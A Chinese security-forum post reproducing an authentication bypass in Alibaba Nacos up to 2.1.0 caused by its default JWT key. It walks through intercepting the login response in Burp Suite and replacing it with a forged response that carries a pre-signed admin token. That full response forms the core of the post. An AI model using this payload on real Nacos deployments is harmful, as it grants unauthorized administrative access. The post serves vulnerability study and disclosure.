【实战分享】Alibab Nacos未经授权的登录-网络攻防学习社区-安全圈子-FancyPig's blog

【实战分享】Alibab Nacos未经授权的登录

Sec-Labs徽章-备受瞩目-FancyPig's blog等级-LV8-FancyPig's blog2个月前发布
7261

项目地址

https://github.com/Al1ex/Alibab-Nacos-Unauthorized-Login

脆弱性影响

Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户

漏洞产品

Nacos <= 2.1.0 版本

漏洞复现

第一步:直接进入Nacos官网,任意填写用户名和密码,使用Burpsuite抓包。

 

ad1a1b7183004817

 

Step 2:拦截响应包。

 

ad1a1b7183004833

 

第三步:修改数据包如下

HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

 

ad1a1b7183004856

 

第四步:释放数据包后登录成功。

 

ad1a1b7183004910

 

学习笔记实战分享工具分享漏洞分享
1
1人已评分
分享
请登录后发表评论

    回复1
    只看作者
    最新最热
    • Adil的头像-FancyPig's blog汉堡会员Adil徽章-人气大使-FancyPig's blog等级-LV5-FancyPig's blog0
      这东西我提交了70多家公司的洞表情[ciya]-FancyPig's blog,还找到了川大的,只不过被别人先提交了
      2个月前
本文作者
用户封面
Sec-Labs的头像-FancyPig's blog
GattFuzz 是一款针对BLE Gatt接口的模糊测试工具。
杀死受反恶意软件保护的进程(BYOVD)
全新理解的下一代目录爆破工具 | spray
OSINT自动化工具,面向黑客。
Arsenal是一个快速的黑客程序清单和启动器。
一个用于攻击和防御安全目的的 Azure AD 工具集合。
分享
网络攻防学习-FancyPig's blog

网络攻防学习

分享网络攻防学习的全部资料
发布
帖子
1433
互动
3134
阅读
27.6W+
本版版主
随便看看

更多圈子

扫码添加微信-FancyPig's blog
在手机上浏览此页面
发布文章发布帖子